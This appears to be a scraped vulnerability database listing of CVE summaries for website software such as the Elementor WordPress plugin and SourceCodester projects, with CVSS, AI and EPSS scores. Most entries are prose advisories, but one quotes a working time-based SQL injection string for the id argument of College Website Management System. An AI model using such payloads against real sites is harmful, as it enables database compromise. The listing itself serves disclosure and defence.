Website Security Vulnerabilities
The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files....
8.8CVSS
8.5AI Score
0.96EPSS
Ecommerce-Website v1 was discovered to contain an arbitrary file upload vulnerability via /customer_register.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP...
9.8CVSS
9.7AI Score
0.104EPSS
Ecommece-Website v1.1.0 was discovered to contain an arbitrary file upload vulnerability via /admin/index.php?slides. This vulnerability allows attackers to execute arbitrary code via a crafted PHP...
8.8CVSS
8.9AI Score
0.044EPSS
A cross-site scripting (XSS) vulnerability in College Website Content Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User Profile Name text...
5.4CVSS
5.2AI Score
0.001EPSS
A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_user at Ecommerce-Website v1.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username text...
4.8CVSS
4.9AI Score
0.001EPSS
An unrestricted file upload at /public/admin/index.php?add_product of Ecommerce-Website v1.1.0 allows attackers to upload a webshell via the Product Image...
8.8CVSS
8.6AI Score
0.005EPSS
A vulnerability was found in College Website Management System 1.0 and classified as problematic. Affected by this issue is the file /cwms/classes/Master.php?f=save_contact of the component Contact Handler. The manipulation leads to persistent cross site scripting. The attack may be launched...
5.4CVSS
5.1AI Score
0.001EPSS
A vulnerability was found in SourceCodester College Website Management System 1.0. It has been classified as critical. Affected is the file /cwms/admin/?page=articles/view_article/. The manipulation of the argument id with the input ' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc with....
9.8CVSS
9.7AI Score
0.001EPSS
Simple Subscription Website v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the view_plan endpoint. This vulnerability allows attackers to dump the application's database via crafted HTTP...
9.8CVSS
9.6AI Score
0.003EPSS
Simple Mobile Comparison Website v1.0 was discovered to contain a SQL injection vulnerability via the search...
9.8CVSS
9.8AI Score
0.002EPSS
The Ibtana WordPress plugin before 1.1.4.9 does not have authorisation and CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings which could lead to Stored Cross-Site Scripting...
3.5CVSS
3.7AI Score
0.001EPSS
Simple College Website 1.0 is vulnerable to unauthenticated file upload & remote code execution via UNION-based SQL injection in the username parameter on...
8.1CVSS
8.8AI Score
0.014EPSS
The email parameter from ajax.php of Video Sharing Website 1.0 appears to be vulnerable to SQL injection attacks. A payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain,...
9.8CVSS
9.7AI Score
0.002EPSS
The Elementor Website Builder WordPress plugin before 3.4.8 does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting...
6.1CVSS
6AI Score
0.001EPSS
SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. via the...
9.8CVSS
9.8AI Score
0.012EPSS
Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in...
There is an unauthorized access vulnerability in the CMS Enterprise Website Construction System 5.0. Attackers can use this vulnerability to directly access the specified background path without logging in to the background to obtain the background administrator...
9.8CVSS
9.2AI Score
0.002EPSS
The Custom Website Data WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the id parameter found in the ~/views/edit.php file which allows attackers to inject arbitrary web scripts, in versions up to and including...
6.1CVSS
6AI Score
0.001EPSS
The JiangQie Official Website Mini Program WordPress plugin before 1.1.1 does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection...
8.8CVSS
9AI Score
0.001EPSS
A SQL INJECTION vulnerability in Sourcecodester Simple Food Website 1.0 allows a remote attacker to Bypass Authentication and become...
9.8CVSS
9.5AI Score
0.002EPSS
Cross-site scripting (XSS) vulnerability in SourceCodester E-Commerce Website v 1.0 allows remote attackers to inject arbitrary web script or HTM via the subject field to...
5.4CVSS
5.3AI Score
0.001EPSS
Arbitrary file upload vulnerability in SourceCodester E-Commerce Website v 1.0 allows attackers to execute arbitrary code via the file upload to...
9.8CVSS
9.7AI Score
0.008EPSS
SQL injection vulnerability in SourceCodester E-Commerce Website V 1.0 allows remote attackers to execute arbitrary SQL statements, via the update parameter to empViewUpdate.php...
9.8CVSS
9.9AI Score
0.002EPSS
SQL injection vulnerability in SourceCodester Simple College Website v 1.0 allows remote attackers to execute arbitrary SQL statements via the id parameter to...
9.8CVSS
9.9AI Score
0.002EPSS
In the Elementor Website Builder WordPress plugin before 3.1.4, the accordion widget (includes/widgets/accordion.php) accepts a ‘title_html_tag’ parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send.....
5.4CVSS
5.4AI Score
0.001EPSS
In the Elementor Website Builder WordPress plugin before 3.1.4, the icon box widget (includes/widgets/icon-box.php) accepts a ‘title_size’ parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
5.4CVSS
5.4AI Score
0.001EPSS
In the Elementor Website Builder WordPress plugin before 3.1.4, the image box widget (includes/widgets/image-box.php) accepts a ‘title_size’ parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
5.4CVSS
5.4AI Score
0.001EPSS
In the Elementor Website Builder WordPress plugin before 3.1.4, the divider widget (includes/widgets/divider.php) accepts an ‘html_tag’ parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
5.4CVSS
5.5AI Score
0.001EPSS
In the Elementor Website Builder WordPress plugin before 3.1.4, the column element (includes/elements/column.php) accepts an ‘html_tag’ parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
5.4CVSS
5.4AI Score
0.001EPSS
In the Elementor Website Builder WordPress plugin before 3.1.4, the heading widget (includes/widgets/heading.php) accepts a ‘header_size’ parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
5.4CVSS
5.5AI Score
0.001EPSS
The Elementor Website Builder plugin before 3.0.14 for WordPress does not properly restrict SVG...
6.1CVSS
6.3AI Score
0.001EPSS
An issue was discovered in the Elementor plugin through 2.9.13 for WordPress. An authenticated attacker can achieve stored XSS via the Name Your Template...
5.4CVSS
5.4AI Score
0.0004EPSS
Elementor 2.9.5 and below WordPress plugin allows authenticated users to activate its safe mode feature. This can be exploited to disable all security plugins on the...
6.5CVSS
6.3AI Score
0.001EPSS
The Elementor plugin before 2.8.5 for WordPress suffers from a reflected XSS vulnerability on the elementor-system-info page. These can be exploited by targeting an authenticated...
5.4CVSS
5.2AI Score
0.001EPSS
The Elementor Page Builder plugin before 2.8.4 for WordPress does not sanitize data during creation of a new...
9.8CVSS
9.4AI Score
0.002EPSS
SQL injection exists in Scriptzee Education Website 1.0 via the college_list.html subject, city, or country...
9.8CVSS
9.8AI Score
0.003EPSS
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has Stored XSS in the Profile Update page via the My Name...
5.4CVSS
5.2AI Score
0.001EPSS
The signature verification routine in install.sh in yarnpkg/website through 2018-06-05 only verifies that the yarn release is signed by any (arbitrary) key in the local keyring of the user, and does not pin the signature to the yarn release key, which allows remote attackers to sign tampered yarn.....
5.9CVSS
6.6AI Score
0.004EPSS
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has directory traversal via a direct request for a listing of an image directory such as an assets/...
6.5CVSS
6.5AI Score
0.001EPSS
PHP Scripts Mall Website Seller Script 2.0.5 allows full Path Disclosure via a request for an arbitrary image URL such as a .png...
5.3CVSS
5.4AI Score
0.002EPSS
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 allows remote attackers to cause a denial of service (unrecoverable blank profile) via crafted JavaScript code in the First Name and Last Name...
6.5CVSS
6.5AI Score
0.001EPSS
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has HTML injection via the First Name...
5.4CVSS
5.8AI Score
0.001EPSS
PHP Scripts Mall Auction website script 2.0.4 allows parameter tampering of the payment...
6.5CVSS
6.5AI Score
0.001EPSS
PHP Scripts Mall Website Seller Script 2.0.5 has XSS via a Profile field such as Company Address, a related issue to...
5.4CVSS
5.2AI Score
0.001EPSS
PHP Scripts Mall Website Seller Script 2.0.5 has XSS via a keyword. NOTE: This may overlap with CVE-2018-6870 which has XSS via the Listings Search...
6.1CVSS
5.9AI Score
0.001EPSS
PHP Scripts Mall Website Seller Script 2.0.5 allows remote attackers to cause a denial of service via crafted JavaScript code in the First Name, Last Name, Company Name, or Fax field, as demonstrated by...
6.5CVSS
6.6AI Score
0.001EPSS
PHP Scripts Mall Website Seller Script 2.0.5 has XSS via Personal Address or Company...
5.4CVSS
5.3AI Score
0.001EPSS
8.8CVSS
8.7AI Score
0.001EPSS
6.1CVSS
6AI Score
0.001EPSS
PHP Scripts Mall Website Seller Script 2.0.3 has CSRF via user_submit.php?upd=2, with resultant...
8.8CVSS
8.7AI Score
0.001EPSS